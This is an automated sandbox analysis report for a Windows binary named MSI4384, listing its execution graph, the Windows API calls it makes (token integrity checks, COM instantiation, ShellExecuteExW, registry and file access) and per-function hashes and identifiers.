                                                                    execution_graph 33715 4281b0 33718 428210 GetTokenInformation 33715->33718 33719 4281e8 33718->33719 33720 42828e GetLastError 33718->33720 33720->33719 33721 428299 33720->33721 33722 4282de GetTokenInformation 33721->33722 33723 4282b9 33721->33723 33724 4282a9 __CreateFrameInfo 33721->33724 33722->33719 33727 4284a0 50 API calls 2 library calls 33723->33727 33724->33722 33726 4282c2 33726->33722 33727->33726 33728 45d2d0 33738 45f553 33728->33738 33739 45f561 33738->33739 33740 45d2d5 33738->33740 33739->33740 33743 45f02d 33739->33743 33742 45f27c FlsAlloc 33740->33742 33748 45f03e 33743->33748 33744 45f07a 33759 4594a1 EnterCriticalSection 33744->33759 33745 45f0e6 GetProcAddress 33745->33744 33748->33744 33748->33745 33750 45f0d7 33748->33750 33760 45f0fa LoadLibraryExW GetLastError LoadLibraryExW ___vcrt_FlsFree 33748->33760 33749 45f083 VirtualProtect 33751 45f0f4 33749->33751 33752 45f0a0 VirtualProtect 33749->33752 33750->33745 33754 45f0df FreeLibrary 33750->33754 33762 45a227 44 API calls __CreateFrameInfo 33751->33762 33752->33751 33753 45f0c8 33752->33753 33761 4594f1 LeaveCriticalSection 33753->33761 33754->33745 33757 45f0f9 33758 45f0cf 33758->33740 33759->33749 33760->33748 33761->33758 33762->33757 33763 449b32 33764 449b3e ___scrt_is_nonwritable_in_current_image 33763->33764 33789 449682 33764->33789 33766 449b45 33767 449c98 33766->33767 33776 449b6f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 33766->33776 33836 44a1f1 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 33767->33836 33769 449c9f 33837 45a713 44 API calls __CreateFrameInfo 33769->33837 33771 449ca5 33838 45a6d7 44 API calls __CreateFrameInfo 33771->33838 33773 449cad 33774 449b8e 33775 449c0f 33800 44a306 33775->33800 33776->33774 33776->33775 33835 45a6ed 44 API calls 3 library calls 33776->33835 33778 449c15 33804 431ee0 GetCommandLineW 33778->33804 33790 44968b 33789->33790 33839 449cec IsProcessorFeaturePresent 33790->33839 33792 449697 33840 44cca8 10 API calls 2 library calls 33792->33840 33794 44969c 33795 4496a0 33794->33795 33841 45b1be 33794->33841 33795->33766 33798 4496b7 33798->33766 33902 44ae90 33800->33902 33802 44a319 GetStartupInfoW 33803 44a32c 33802->33803 33803->33778 33805 431f20 33804->33805 33903 424f50 LocalAlloc 33805->33903 33807 431f31 33904 428de0 33807->33904 33809 431f89 33810 431f9d 33809->33810 33811 431f8d 33809->33811 33912 431090 LocalAlloc LocalAlloc 33810->33912 33959 4289d0 84 API calls _ValidateLocalCookies 33811->33959 33814 431f96 33816 4320e6 ExitProcess 33814->33816 33815 431fa9 33913 4313a0 33815->33913 33822 431feb 33931 42ae70 33822->33931 33824 432042 33825 432074 33824->33825 33827 422ae0 45 API calls 33824->33827 33830 4320c8 33825->33830 33937 429060 33825->33937 33827->33825 33828 4320af 33829 4320bb 33828->33829 33828->33830 33960 4318c0 CreateFileW SetFilePointer WriteFile CloseHandle 33829->33960 33961 4240d0 45 API calls 33830->33961 33833 4320d7 33962 4320f0 LocalFree LocalFree 33833->33962 33835->33775 33836->33769 33837->33771 33838->33773 33839->33792 33840->33794 33845 4627f6 33841->33845 33844 44ccc7 7 API calls 2 library calls 33844->33795 33846 462806 33845->33846 33847 4496a9 33845->33847 33846->33847 33850 45e910 33846->33850 33862 45f530 VirtualProtect 33846->33862 33847->33798 33847->33844 33851 45e91c ___scrt_is_nonwritable_in_current_image 33850->33851 33863 4594a1 EnterCriticalSection 33851->33863 33853 45e923 33864 462e16 33853->33864 33856 45e941 33879 45e967 LeaveCriticalSection std::_Lockit::~_Lockit 33856->33879 33859 45e93c 33878 45e859 GetStdHandle GetFileType 33859->33878 33860 45e952 33860->33846 33862->33846 33863->33853 33865 462e22 ___scrt_is_nonwritable_in_current_image 33864->33865 33866 462e4c 33865->33866 33867 462e2b 33865->33867 33880 4594a1 EnterCriticalSection 33866->33880 33888 44e5d2 13 API calls __Wcscoll 33867->33888 33870 462e30 33889 44e437 44 API calls __cftoe 33870->33889 33872 462e84 33890 462eab LeaveCriticalSection std::_Lockit::~_Lockit 33872->33890 33873 45e932 33873->33856 33877 45e7a9 47 API calls 33873->33877 33874 462e58 33874->33872 33881 462d66 33874->33881 33877->33859 33878->33856 33879->33860 33880->33874 33891 45ed50 33881->33891 33886 462dda 33886->33874 33887 462d85 33899 45ccb0 13 API calls 2 library calls 33887->33899 33888->33870 33889->33873 33890->33873 33896 45ed5d __cftoe 33891->33896 33892 45eda0 33901 44e5d2 13 API calls __Wcscoll 33892->33901 33893 45ed8b RtlAllocateHeap 33894 45ed9e 33893->33894 33893->33896 33894->33887 33898 45f3d0 InitializeCriticalSectionEx 33894->33898 33896->33892 33896->33893 33900 462890 EnterCriticalSection LeaveCriticalSection __cftoe 33896->33900 33899->33886 33900->33896 33901->33894 33902->33802 33903->33807 33905 428e32 33904->33905 33906 428e74 33905->33906 33909 428e62 33905->33909 33907 4494f0 _ValidateLocalCookies 5 API calls 33906->33907 33908 428e82 33907->33908 33908->33809 33963 4494f0 33909->33963 33911 428e70 33911->33809 33912->33815 33914 4313b4 33913->33914 33918 43176e 33913->33918 33915 431787 33914->33915 33914->33918 33971 428620 9 API calls 33915->33971 33917 431791 RegOpenKeyExW 33917->33918 33919 4317ac RegQueryValueExW 33917->33919 33920 422ae0 33918->33920 33919->33918 33921 422b01 33920->33921 33921->33921 33972 423b70 33921->33972 33923 422b19 33924 429380 33923->33924 33980 422b20 33924->33980 33926 4293c6 33996 429b40 33926->33996 33932 42ae7a 33931->33932 33933 42ae7d 33931->33933 33932->33824 33935 42ae8a ___vcrt_FlsFree 33933->33935 34044 453173 45 API calls 2 library calls 33933->34044 33935->33824 33936 42ae9d 33936->33824 33938 429094 33937->33938 33939 4290a9 33937->33939 33938->33828 34045 426050 GetCurrentProcess OpenProcessToken 33939->34045 33941 4290bc 33942 429196 33941->33942 33944 4290d6 33941->33944 33943 421fd0 65 API calls 33942->33943 33945 4291bd 33943->33945 34050 421fd0 33944->34050 33946 421fd0 65 API calls 33945->33946 33948 4291d2 33946->33948 33950 421fd0 65 API calls 33948->33950 33949 4290ea 33951 421fd0 65 API calls 33949->33951 33952 4291e3 33950->33952 33953 429107 33951->33953 34116 427800 33952->34116 33955 421fd0 65 API calls 33953->33955 33956 429115 33955->33956 34069 426fe0 33956->34069 33958 42912d 33958->33828 33959->33814 33960->33830 33961->33833 33962->33816 33964 4494f8 33963->33964 33965 4494f9 IsProcessorFeaturePresent 33963->33965 33964->33911 33967 44989a 33965->33967 33970 44985d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33967->33970 33969 44997d 33969->33911 33970->33969 33971->33917 33973 423c41 33972->33973 33976 423b84 _Yarn 33972->33976 33979 4236e0 45 API calls 33973->33979 33976->33923 33981 422b46 33980->33981 33982 422c01 33981->33982 33985 422bfc 33981->33985 33988 422bd0 LocalAlloc 33981->33988 33989 422b95 33981->33989 33991 422b5b _Yarn 33981->33991 34034 4236e0 45 API calls 33982->34034 33984 422c06 34035 44e447 44 API calls 2 library calls 33984->34035 34033 423b50 RaiseException Concurrency::cancel_current_task 33985->34033 33988->33991 33989->33985 33990 422b9c LocalAlloc 33989->33990 33990->33984 33992 422bab 33990->33992 33991->33926 33992->33991 33997 429b9a ___vcrt_FlsFree 33996->33997 34001 429d02 ___vcrt_FlsFree 33996->34001 34000 429bc5 33997->34000 33997->34001 33998 4494f0 _ValidateLocalCookies 5 API calls 33999 4293db 33998->33999 34023 429e60 33999->34023 34002 429be2 34000->34002 34003 429e41 34000->34003 34005 429e4b 34001->34005 34006 429d5b 34001->34006 34018 429ce9 34001->34018 34007 423b70 45 API calls 34002->34007 34039 4246e0 45 API calls 34003->34039 34041 4246e0 45 API calls 34005->34041 34008 423b70 45 API calls 34006->34008 34009 429c06 34007->34009 34012 429d7f 34008->34012 34036 42a150 48 API calls _Yarn 34009->34036 34010 429e46 34040 44e447 44 API calls 2 library calls 34010->34040 34038 423d20 45 API calls 34012->34038 34017 429c21 34037 423d20 45 API calls 34017->34037 34018->33998 34020 429c6a 34020->34010 34020->34018 34021 429cde 34020->34021 34021->34018 34022 429ce2 LocalFree 34021->34022 34022->34018 34032 429edc _Yarn 34023->34032 34024 4293f3 34024->33822 34025 42a0f7 34025->34024 34027 42a111 LocalFree 34025->34027 34026 42a141 34042 44e447 44 API calls 2 library calls 34026->34042 34027->34024 34029 42a146 34043 4246e0 45 API calls 34029->34043 34032->34024 34032->34025 34032->34026 34032->34029 34036->34017 34037->34020 34038->34018 34044->33936 34046 426071 34045->34046 34047 426077 GetTokenInformation 34045->34047 34046->33941 34048 4260a6 34047->34048 34049 4260ae CloseHandle 34047->34049 34048->34049 34049->33941 34166 4225a0 34050->34166 34053 42200a 34068 4220bb 34053->34068 34181 421cc0 10 API calls 34053->34181 34054 422109 34185 4218e0 LocalFree RaiseException Concurrency::cancel_current_task 34054->34185 34056 4220ab 34056->34068 34186 4218e0 LocalFree RaiseException Concurrency::cancel_current_task 34056->34186 34058 42211d 34060 422048 34061 422052 FindResourceW 34060->34061 34060->34068 34062 42206a 34061->34062 34061->34068 34182 421d80 LoadResource LockResource SizeofResource 34062->34182 34064 422074 34065 42209b 34064->34065 34064->34068 34183 422810 44 API calls 34064->34183 34184 44e8d2 44 API calls 3 library calls 34065->34184 34068->33949 34070 426050 4 API calls 34069->34070 34071 42702a 34070->34071 34072 427052 CoInitialize CoCreateInstance 34071->34072 34073 427030 34071->34073 34075 427095 VariantInit 34072->34075 34080 42708c 34072->34080 34074 427800 88 API calls 34073->34074 34076 42704a 34074->34076 34077 4270e3 34075->34077 34079 4494f0 _ValidateLocalCookies 5 API calls 34076->34079 34082 4270f2 IUnknown_QueryService 34077->34082 34088 4270e9 VariantClear 34077->34088 34078 427689 CoUninitialize 34078->34076 34081 4276a9 34079->34081 34080->34076 34080->34078 34081->33958 34084 427121 34082->34084 34082->34088 34085 4271aa IUnknown_QueryInterface_Proxy 34084->34085 34084->34088 34086 4271b9 34085->34086 34085->34088 34087 42720c IUnknown_QueryInterface_Proxy 34086->34087 34086->34088 34087->34088 34089 42721b CoAllowSetForegroundWindow 34087->34089 34088->34080 34090 427292 SysAllocString 34089->34090 34091 42722f SysAllocString 34089->34091 34090->34091 34092 4276b2 _com_issue_error 34090->34092 34095 427262 SysAllocString 34091->34095 34096 42725a 34091->34096 34198 4218e0 LocalFree RaiseException Concurrency::cancel_current_task 34092->34198 34098 4272ab VariantInit 34095->34098 34099 427288 34095->34099 34096->34092 34096->34095 34097 4276c6 34097->33958 34102 427331 34098->34102 34099->34092 34099->34098 34100 427337 VariantClear VariantClear VariantClear VariantClear SysFreeString 34100->34088 34102->34100 34107 427382 34102->34107 34103 423b70 45 API calls 34103->34107 34107->34100 34107->34102 34107->34103 34108 4276ad 34107->34108 34109 427428 LocalFree 34107->34109 34111 42747d OpenProcess WaitForSingleObject 34107->34111 34114 4274cc CloseHandle 34107->34114 34115 427517 LocalFree 34107->34115 34193 424170 51 API calls 2 library calls 34107->34193 34194 4262b0 92 API calls 2 library calls 34107->34194 34195 423d20 45 API calls 34107->34195 34196 426b50 10 API calls 34107->34196 34197 44e447 44 API calls 2 library calls 34108->34197 34109->34107 34111->34107 34113 4274b2 GetExitCodeProcess 34111->34113 34113->34107 34114->34107 34115->34107 34117 427874 34116->34117 34199 422120 45 API calls 4 library calls 34117->34199 34119 42788c 34200 422120 45 API calls 4 library calls 34119->34200 34121 4278a3 34201 427fb0 57 API calls 2 library calls 34121->34201 34123 4278bb 34124 427c8b 34123->34124 34125 4278ea 34123->34125 34202 422810 44 API calls 34123->34202 34210 4218e0 LocalFree RaiseException Concurrency::cancel_current_task 34124->34210 34203 452f8c 46 API calls 34125->34203 34128 427c95 GetWindowThreadProcessId 34130 427cf1 34128->34130 34131 427cbe GetWindowLongW 34128->34131 34130->33958 34131->33958 34132 4278f8 34132->34124 34133 427909 34132->34133 34204 422120 45 API calls 4 library calls 34133->34204 34135 427a08 34136 427a66 34135->34136 34137 427a5d GetForegroundWindow 34135->34137 34138 427a76 ShellExecuteExW 34136->34138 34137->34136 34139 427a87 34138->34139 34140 427a90 34138->34140 34207 427e40 6 API calls 34139->34207 34141 427acb 34140->34141 34144 427aa6 ShellExecuteExW 34140->34144 34150 427bae 34141->34150 34151 427af7 GetModuleHandleW GetProcAddress 34141->34151 34142 4279cf GetWindowsDirectoryW 34205 421950 68 API calls 34142->34205 34144->34141 34147 427ac2 34144->34147 34146 4279f0 34206 421950 68 API calls 34146->34206 34208 427e40 6 API calls 34147->34208 34153 427bd8 34150->34153 34154 427bc2 WaitForSingleObject GetExitCodeProcess 34150->34154 34155 427b1b AllowSetForegroundWindow 34151->34155 34152 42791e 34152->34135 34152->34142 34209 427f30 CloseHandle 34153->34209 34154->34153 34155->34150 34158 427b2f 34155->34158 34158->34150 34160 427b38 GetModuleHandleW GetProcAddress 34158->34160 34159 427be7 34161 4494f0 _ValidateLocalCookies 5 API calls 34159->34161 34160->34150 34163 427b56 34160->34163 34162 427c83 34161->34162 34162->33958 34163->34150 34164 427b6c Sleep EnumWindows 34163->34164 34164->34163 34165 427b98 SetWindowPos 34164->34165 34165->34150 34167 4225d8 34166->34167 34168 42262c 34166->34168 34187 4495a8 AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepConditionVariableSRW 34167->34187 34180 422000 34168->34180 34190 4495a8 AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepConditionVariableSRW 34168->34190 34170 4225e2 34170->34168 34173 4225ee GetProcessHeap 34170->34173 34172 422646 34172->34180 34191 449848 47 API calls 34172->34191 34188 449848 47 API calls 34173->34188 34176 42261b 34189 449557 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 34176->34189 34177 4226a6 34192 449557 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 34177->34192 34180->34053 34180->34054 34181->34060 34182->34064 34183->34065 34184->34056 34185->34056 34186->34058 34187->34170 34188->34176 34189->34168 34190->34172 34191->34177 34192->34180 34193->34107 34194->34107 34195->34107 34196->34107 34198->34097 34199->34119 34200->34121 34201->34123 34202->34125 34203->34132 34204->34152 34205->34146 34206->34135 34207->34140 34208->34141 34209->34159 34210->34128

                                                                    Executed Functions

                                                                    Function 00426FE0 Relevance: 46.1, APIs: 25, Strings: 1, Instructions: 559comCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 426fe0-42702e call 426050 3 427052-42708a CoInitialize CoCreateInstance 0->3 4 427030-42704d call 427800 0->4 6 427095-4270e7 VariantInit 3->6 7 42708c-427090 3->7 12 427692-4276ac call 4494f0 4->12 20 4270f2-427116 IUnknown_QueryService 6->20 21 4270e9-4270ed 6->21 9 427661-42766a 7->9 10 42767c-427687 9->10 11 42766c-42767a 9->11 14 427689 CoUninitialize 10->14 15 42768f 10->15 11->10 14->15 15->12 23 427121-427145 20->23 24 427118-42711c 20->24 22 427635-42763e 21->22 26 427650-42765b VariantClear 22->26 27 427640-42764e 22->27 33 427150-42717b 23->33 34 427147-42714b 23->34 25 42761a-427623 24->25 25->22 29 427625-427633 25->29 26->9 27->26 29->22 40 427186-4271ae IUnknown_QueryInterface_Proxy 33->40 41 42717d-427181 33->41 35 4275ff-427608 34->35 35->25 36 42760a-427618 35->36 36->25 45 4271b0-4271b4 40->45 46 4271b9-4271dd 40->46 42 4275e4-4275ed 41->42 42->35 43 4275ef-4275fd 42->43 43->35 47 4275c9-4275d2 45->47 53 4271e8-427210 IUnknown_QueryInterface_Proxy 46->53 54 4271df-4271e3 46->54 47->42 50 4275d4-4275e2 47->50 50->42 58 427212-427216 53->58 59 42721b-42722d CoAllowSetForegroundWindow 53->59 55 4275ae-4275b7 54->55 55->47 56 4275b9-4275c7 55->56 56->47 61 427593-42759c 58->61 62 427292-4272a3 SysAllocString 59->62 63 42722f-427231 59->63 61->55 64 42759e-4275ac 61->64 65 4272a9 62->65 66 4276bc-427702 call 4218e0 62->66 67 427237-427258 SysAllocString 63->67 64->55 65->67 78 427714-427723 66->78 79 427704-427712 66->79 69 427262-427286 SysAllocString 67->69 70 42725a-42725c 67->70 74 4272ab-427335 VariantInit 69->74 75 427288-42728a 69->75 70->69 73 4276b2-4276b7 call 432170 70->73 73->66 83 427340-427344 74->83 84 427337-42733b 74->84 75->73 76 427290 75->76 76->74 79->78 86 427540 83->86 87 42734a-42734f 83->87 85 427544-42758d VariantClear * 4 SysFreeString 84->85 85->61 86->85 88 427352-427371 87->88 89 427377-427380 88->89 89->89 90 427382-4273fe call 423b70 call 424170 call 4262b0 call 423d20 89->90 99 427400-427411 90->99 100 42742f-42744b 90->100 101 427413-42741e 99->101 102 427424-427426 99->102 103 427452 100->103 104 42744d-427450 100->104 101->102 105 4276ad call 44e447 101->105 102->100 106 427428-427429 LocalFree 102->106 107 427459-42745b 103->107 104->107 105->73 106->100 109 4274e0-4274ef 107->109 110 427461-42746b 107->110 111 427533-42753a 109->111 112 4274f1-427500 109->112 113 42747d-4274b0 OpenProcess WaitForSingleObject 110->113 114 42746d-42747b call 426b50 110->114 111->86 111->88 118 427502-42750d 112->118 119 427513-427515 112->119 116 4274b2-4274b4 GetExitCodeProcess 113->116 117 4274ba-4274ca 113->117 114->113 116->117 121 4274cc-4274d3 CloseHandle 117->121 122 4274dd 117->122 118->105 118->119 123 427517-427518 LocalFree 119->123 124 42751e-42752c 119->124 121->122 122->109 123->124 124->111
                                                                    APIs
                                                                      • Part of subcall function 00426050: GetCurrentProcess.KERNEL32(00000008,?,F3E52339), ref: 00426060
                                                                      • Part of subcall function 00426050: OpenProcessToken.ADVAPI32(00000000), ref: 00426067
                                                                    • CoInitialize.OLE32(00000000), ref: 00427052
                                                                    • CoCreateInstance.OLE32(0046FD30,00000000,00000004,0047A530,00000000,?), ref: 00427082
                                                                    • CoUninitialize.COMBASE ref: 00427689
                                                                    • _com_issue_error.COMSUPP ref: 004276B7
                                                                      • Part of subcall function 004218E0: LocalFree.KERNEL32(?,F3E52339,?,00000000,0046B020,000000FF,?,?,00480558,?,?,004216A4,80004005), ref: 0042192C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                    • String ID: $
                                                                    • API String ID: 2507920217-3993045852
                                                                    • Opcode ID: d0b1e1f6d63ff4b318f897e3804dffeb5f1544878988a1113e186b39c3d0e9f4
                                                                    • Instruction ID: 32f417b831cbff905dad250218ed214d7d438bb8c38f81797d05b7b3ecea7306
                                                                    • Opcode Fuzzy Hash: d0b1e1f6d63ff4b318f897e3804dffeb5f1544878988a1113e186b39c3d0e9f4
                                                                    • Instruction Fuzzy Hash: 4832C170A04258DFDB11CFA8E818BAEBBB4AF09304F1440AAE445E7391DB795E49CF56
                                                                    Function 0045F02D Relevance: 6.1, APIs: 4, Instructions: 83memorylibraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 125 45f02d-45f03c 126 45f075-45f078 125->126 127 45f03e-45f04c 126->127 128 45f07a 126->128 129 45f04e-45f050 127->129 130 45f058-45f069 call 45f0fa 127->130 131 45f07c-45f09e call 4594a1 VirtualProtect 128->131 132 45f0e6-45f0f2 GetProcAddress 129->132 133 45f056 129->133 139 45f0d7-45f0dd 130->139 140 45f06b-45f070 130->140 141 45f0f4-45f0f9 call 45a227 131->141 142 45f0a0-45f0c6 VirtualProtect 131->142 132->131 136 45f072 133->136 136->126 139->132 144 45f0df-45f0e0 FreeLibrary 139->144 140->136 142->141 143 45f0c8-45f0d6 call 4594f1 142->143 144->132
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000004,00000000,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F096
                                                                    • VirtualProtect.KERNELBASE(00486000,00000080,00000002,00000000,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F0BE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F0E0
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0045F0EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual$AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3998452802-0
                                                                    • Opcode ID: 3b523e94cf9b72af1f3778c66793d88a910f728f58033c36b3c4c6c5a7fd423b
                                                                    • Instruction ID: dbed3c2c82288a75c0616735a7f85422b6407906c223c68fc4ef6185f7824b95
                                                                    • Opcode Fuzzy Hash: 3b523e94cf9b72af1f3778c66793d88a910f728f58033c36b3c4c6c5a7fd423b
                                                                    • Instruction Fuzzy Hash: 33213D32600121ABCB215B69EC41A5B3398DF42B71B28423BFD11D72C2DF64DC0D869B
                                                                    Function 00426050 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 149 426050-42606f GetCurrentProcess OpenProcessToken 150 426071-426076 149->150 151 426077-4260a4 GetTokenInformation 149->151 152 4260a6-4260ab 151->152 153 4260ae-4260be CloseHandle 151->153 152->153
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008,?,F3E52339), ref: 00426060
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00426067
                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0042609C
                                                                    • CloseHandle.KERNEL32(?), ref: 004260B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0
                                                                    • Opcode ID: adbb8c9d4858cc378d76e707055d0eb316b380be385038f57e84315f64713180
                                                                    • Instruction ID: 1d30a98ab121370f75b51424ec29e2e9926d5a919a4b8ad43ffd55d4d0d1dcd0
                                                                    • Opcode Fuzzy Hash: adbb8c9d4858cc378d76e707055d0eb316b380be385038f57e84315f64713180
                                                                    • Instruction Fuzzy Hash: 57F01274144301ABEB10DF20FC45B9A77E8BB44740F948839F9D4C1261E7B9955CEA67
                                                                    Function 00431EE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(F3E52339,?,0000FFFF), ref: 00431F0D
                                                                      • Part of subcall function 00424F50: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000,?,?), ref: 00424F6C
                                                                    • ExitProcess.KERNEL32 ref: 004320E7
                                                                      • Part of subcall function 004289D0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00428A4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                    • String ID: Full command line:
                                                                    • API String ID: 1878577176-831861440
                                                                    • Opcode ID: 5f96dc68325525e323844a25e8897eee4a72fca6097062d7c5d0fb5ddce2be71
                                                                    • Instruction ID: 32d1c9a58d58fddcfcc5cbc652822765dc570c8019c1a829e8e345e228db0e74
                                                                    • Opcode Fuzzy Hash: 5f96dc68325525e323844a25e8897eee4a72fca6097062d7c5d0fb5ddce2be71
                                                                    • Instruction Fuzzy Hash: 4851B230D111289ACB25EB21DC59BEEB775AF54308F5441DEE009672A2EF781F88CB99
                                                                    Function 00428210 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 212 428210-42828c GetTokenInformation 213 4282f0-428303 212->213 214 42828e-428297 GetLastError 212->214 214->213 215 428299-4282a7 214->215 216 4282a9-4282ac 215->216 217 4282ae 215->217 218 4282db 216->218 219 4282b0-4282b7 217->219 220 4282de-4282ea GetTokenInformation 217->220 218->220 221 4282c7-4282d8 call 44ae90 219->221 222 4282b9-4282c5 call 4284a0 219->222 220->213 221->218 222->220
                                                                    APIs
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,004281E8,F3E52339), ref: 00428284
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,004281E8,F3E52339), ref: 0042828E
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,004281E8,F3E52339), ref: 004282EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InformationToken$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2567405617-0
                                                                    • Opcode ID: 808ee225d85512db5ca782e82fe2820d92cb9b9b04e6e1c1e1867febcc62d584
                                                                    • Instruction ID: abd610c3f5e292a3544d3a6ea920f36b6db94296c5baa8cb015c51854724f721
                                                                    • Opcode Fuzzy Hash: 808ee225d85512db5ca782e82fe2820d92cb9b9b04e6e1c1e1867febcc62d584
                                                                    • Instruction Fuzzy Hash: 0E31EE71A00615EFDB20CF98DC44BAFBBF9FB44710F60052EE415E3280EBB969048BA4
                                                                    Function 0045ED50 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
